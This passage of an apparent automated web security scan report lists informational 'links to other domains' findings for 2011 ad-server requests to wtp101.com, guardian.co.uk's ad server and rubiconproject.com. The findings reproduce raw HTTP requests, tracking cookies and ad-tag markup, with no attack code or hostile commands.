</SCRIPT>
...[SNIP]...
TZhMDc1NmPgBADpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=http://ad.doubleclick.net/jump/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1239357571?">
<IMG SRC="http://fw.adsafeprotected.com/rfw/dc/10625/165710/ad/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1239357571?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1220/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...
19.154. http://o-va3.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imp?bc=CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscvhQXm1RSwi_skszjsFtTxBnAoxa_C0A HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M#,1317600740; pvmap=!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:30:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M#,1317601852; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317601852,ova3!3919,1317601775,ova3!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1505999587?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1505999587?">
</SCRIPT>
...[SNIP]...
TZhMDc1NmPgBADpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M%3D&redir=http://ad.doubleclick.net/jump/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1505999587?">
<IMG SRC="http://fw.adsafeprotected.com/rfw/dc/10625/165710/ad/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1505999587?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1220/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...
19.155. http://o-va3.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; s=!1762!3105!2445!1731; synclock=t

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:03:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600201,ova3!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1654066132?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1654066132?">
</SCRIPT>
...[SNIP]...
TZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=http://ad.doubleclick.net/jump/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1654066132?">
<IMG SRC="http://fw.adsafeprotected.com/rfw/dc/10625/165710/ad/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1654066132?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1220/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...
19.156. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live/oas.html/1643482332@Top,Middle2,Right1,x31,Position4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live/oas.html/1643482332@Top,Middle2,Right1,x31,Position4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live/oas.html/1643482332@Top,Middle2,Right1,x31,Position4?k=championsleague&k=sport&k=football&k=basel&k=champions-league-2011-12&k=manchester-united&cf=live&pid=&ct=article&pt=article& HTTP/1.1
Host: oas.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; NSC_hvbsejbo-efm_qppm_iuuq=ffffffff0909d78045525d5f4f58455e445a4a423660; member_type=0; GU_ST=; rsi_segs=; s_pers=%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20s_lv%3D1317599870523%7C1412207870523%3B%20s_lv_s%3DFirst%2520Visit%7C1317601670523%3B%20s_visit%3D1%7C1317601670535%3B%20c_dl%3D1%7C1317601670538%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601670544%3B%20s_nr%3D1317599870547-New%7C1349135870547%3B; s_sess=%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_ppv%3D27%3B%20s_sq%3Dguardiangu-football%252Cguardiangu-network%253D%252526pid%25253DManchester%25252520United%2525253AKeyword%25252520Page%2525253A589863%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.guardian.co.uk%2525252Ffootball%2525252F2011%2525252Fsep%2525252F27%2525252Fmanchester-united-basel-live%252526ot%25253DA%3B%20s_cc%3Dtrue%3B

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 7470
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Middle2') {
document.write ('\n');
document.write ('<!-- Rubicon Project Tag -->\n');
document.write ('<!-- Site: guardian.co.uk (US) Zone: Sports BTF MPU Size: Medium Rectangle -->\n');
document.write ('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="300" HEIGHT="250"></IFRAME>
...[SNIP]...
</SCRIPT>\n');
document.write (' \n');
document.write (' ');
}
if (position == 'Position4') {
document.write ('<IMG SRC="http://imageceu1.247realmedia.com/0/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0">\n');
document.write (' \n');
document.write (' <SCRIPT language="JavaScript1.1">
...[SNIP]...
<!-- Site: guardian.co.uk (US) Zone: Sports Size: Medium Rectangle -->\n');
document.write ('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="300" HEIGHT="250"></IFRAME>
...[SNIP]...
<!-- Site: guardian.co.uk (US) Zone: Sports Size: Leaderboard -->\n');
document.write ('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="728" HEIGHT="90"></IFRAME>
...[SNIP]...
</SCRIPT>\n');
document.write (' \n');
document.write (' ');
}
if (position == 'x31') {
document.write ('<IMG SRC="http://imageceu1.247realmedia.com/0/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0">\n');
document.write (' \n');
document.write (' <SCRIPT language="JavaScript1.1">
...[SNIP]...
19.157. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4?k=manchester-united&cf=premier+league&pid=&ct=&pt=keyword& HTTP/1.1
Host: oas.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_sess=%20s_cc%3Dtrue%3B

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 5814
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Position4') {
document.write ('<IMG SRC="http://imageceu1.247realmedia.com/0/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0">\n');
document.write (' \n');
document.write (' <SCRIPT language="JavaScript1.1">
...[SNIP]...
<!-- Site: guardian.co.uk (US) Zone: Sports Size: Medium Rectangle -->\n');
document.write ('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="300" HEIGHT="250"></IFRAME>
...[SNIP]...
<!-- Site: guardian.co.uk (US) Zone: Sports Size: Leaderboard -->\n');
document.write ('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="728" HEIGHT="90"></IFRAME>
...[SNIP]...
</SCRIPT>\n');
document.write (' \n');
document.write (' ');
}
if (position == 'x31') {
document.write ('<IMG SRC="http://imageceu1.247realmedia.com/0/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0">\n');
document.write (' \n');
document.write (' <SCRIPT language="JavaScript1.1">
...[SNIP]...
19.158. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-15.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /a/7845/12566/22557-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^149&12566^2&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599465&3223117.js^3^1317599464^1317599464&3226249.js^10^1317599341^1317599463&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:51:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
